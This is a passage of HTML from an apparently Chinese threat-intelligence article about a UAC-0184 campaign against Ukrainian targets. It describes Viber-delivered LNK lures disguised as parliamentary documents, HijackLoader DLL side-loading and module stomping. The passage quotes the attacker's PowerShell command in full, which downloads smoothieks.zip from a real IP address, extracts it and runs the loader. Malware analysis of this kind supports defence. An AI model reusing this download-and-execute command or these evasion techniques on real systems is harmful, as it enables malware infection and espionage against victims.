135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><strong style="color: rgb(190, 25, 31);font-size: 17px;letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">2.1. 初始访问与投递</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">攻击者通过Viber向目标用户发送名为А2393.zip的恶意归档文件。解压后，该压缩包包含多个伪装成合法文档的LNK快捷方式文件文件名，诱导性强，意图通过社会工程学手段诱使用户点击。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100024088" data-ratio="0.13507109004739337" data-w="844" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=1e79cbbf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDo1p9LQH9yCGrwuicIzPicklLxEZQAo3cQTicwyK0IzSaQa7ibPHwB8WLIw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">诱饵文档如下：</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">Zapit_iz_verhovnoi_radi.docx【来自最高拉达（乌克兰议会）的质询】</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100024089" data-ratio="1.411764705882353" data-w="459" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=6fd7ab9f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDIOARw18EhyL6W99V9g0GsPDibvAlSVCK41YrDwUtXne1YC3fZ6WaQww%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">Scan_zapitu_iz_verhovnoi_radi.rtf【最高拉达质询函扫描件，内容为关于审议已故乌克兰卫士亲属集体申诉事宜】</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100024090" data-ratio="1.0604166666666666" data-w="480" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=695282b4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDJDrv7TOSBmwfLrEibz8gtpfF5GxickpeQ0JjKOUTIguvjOicXxBtsFLLg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">Dodatok_do_zapitu.xlsx【质询函附件，内容为2023年1月1日至2025年1月31日期间人员总损失名单】</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100024091" data-ratio="0.08439306358381503" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=c96baf76&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDibT15QvtjXOdj2vA1vx8Gbgs0GDU6f22DBdZfAiabV8OEUEQsjYoJPkg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><strong style="color: rgb(190, 25, 31);font-size: 17px;letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">2.2. 下载与执行</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">UAC-0184交替利用恶意LNK文件与PowerShell脚本作为第一阶段的初始入侵载体[1]。尽管这两种方式均旨在向受害者展示诱饵文档的同时，于后台隐蔽执行HijackLoader感染链，但其诱饵投递机制存在显著差异：</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">基于LNK的攻击：</span>需发起两次独立的C2请求，分别用于获取诱饵文件和包含恶意加载器的ZIP压缩包。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">基于PowerShell的攻击：</span>仅发起一次网络请求，下载的ZIP压缩包中已内嵌了诱饵文档。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">在本次捕获的LNK攻击样本中，LNK文件执行后首先发起请求下载并运行PowerShell脚本。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024092" class="rich_pages wxw-img" data-ratio="0.05086705202312139" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=cb7bacee&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDPSTbhiaAw42U9jCteu8icS0PJsm93JzMibMOO6ndrrjxibHNNkhr56JUlg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">随后，该脚本从远程C2服务器拉取并解压第二阶段载荷 smoothieks.zip，启动合法宿主进程CFlux.exe加载恶意模块，并同步打开诱饵文档以降低受害者警觉。</span></span></p><table><tbody><tr><td data-colwidth="576"><p><span leaf=""><span textstyle="" style="font-size: 15px;">echo rKtGxKJUaoCCtexNyfdt; if (-not[IO.File]::Exists((&#39;smoothieks&#39;+&#39;.&#39;+&#39;zip&#39;))){&amp;(Get-Command i**************************o*********************************e-We*) -uri ht&#39;&#39;tp&#39;&#39;://5.101.8&#39;&#39;5.24/smoothieks.zip -OutFile smoothieks.zip};if (-not[IO.File]::Exists((&#39;MSWinDistro/&#39;+&#39;CFlux&#39;+&#39;.&#39;+&#39;exe&#39;)) -and -not [IO.File]::Exists((&#39;MSWinDistro/&#39;+&#39;Dodatok_do_zapitu&#39;+&#39;.xlsx&#39;))){Expand-Archive smoothieks.zip -DestinationPath MSWinDistro};start &#39;MSWinDistro/CFlux.exe&#39;;start &#39;MSWinDistro/Dodatok_do_zapitu.xlsx</span></span></p></td></tr></tbody></table><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">smoothieks.zip压缩包内的文件：</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100024093" data-ratio="0.2705202312138728" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=49f74994&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDNicZrbf2iaR5o5KULzjVKaic3ErfKnjYWia0tYKFD0eNURezr2FveRfADQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.3. DLL侧加载与流劫持</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">CFlux.exe启动后，通过DLL侧加载（DLL Side-Loading）技术加载了位于同目录下的恶意动态链接库CDWizard.dll。该恶意DLL修改了原始函数逻辑，以便在运行时动态加载SQLite.Interop.dll。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024094" class="rich_pages wxw-img" data-ratio="0.3625154130702836" data-type="png" data-w="811" src="https://wechat2rss.xlab.app/img-proxy/?k=5ca80abf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDvmfliaVu1blyKJicG3vSa7gTzZ8kF1vt6u2ksPuZDXHsATmQRTC95gbA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">值得注意的是，恶意代码摒弃了通过导出表解析函数的常规API调用方式，转而直接跳转至SQLite.Interop.dll内部的硬编码偏移地址0xF3735处执行后续指令。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100024095" data-ratio="0.4056482670089859" data-w="779" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=b5d498d7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDHJEU60HemyQEBiaRD3qzV1nPlC7oZ60ibchCN2mjf0xYqqrJJxrbuIiag%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">这种非标准的控制流转移技术有效地混淆了执行路径，显著增加了静态分析与检测的难度。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">攻击者将API解析逻辑封装在sqlite3_log函数内部，将其伪装成看似无害的合法日志记录操作。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024096" class="rich_pages wxw-img" data-ratio="0.08092485549132948" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=ad4d24ac&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDao43FhZTsdXXzMRlZ3g69Q6cJwnRmcXwzAH5ENaCPO4tDxPfYBwfOA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.4. 解密与第一次注入</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">载荷执行阶段，恶意代码首先解密Hekgiegsteal.lt文件中的加密数据提取出Shellcode（ADD算法）。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100024097" data-ratio="0.6184971098265896" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=ef0e9a07&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJD3XKKE8GfQA4QhRVtB9Wk1zd7rY8gluqXNwqc9StShYZ4dwvBW5kWmw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">紧接着，攻击者实施Module Stomping：加载合法的evr.dll模块，并直接将其可执行代码段（.text）替换为恶意Shellcode，同时传入Jabveak.qafy作为后续阶段载荷参数。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100024098" data-ratio="0.10867052023121387" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=ae539be6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDQ6fVDk7ePCia3iaZqjPQicnA3jVpujfUN5viaRwWjy04EJQ0QtVMicniaKRQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 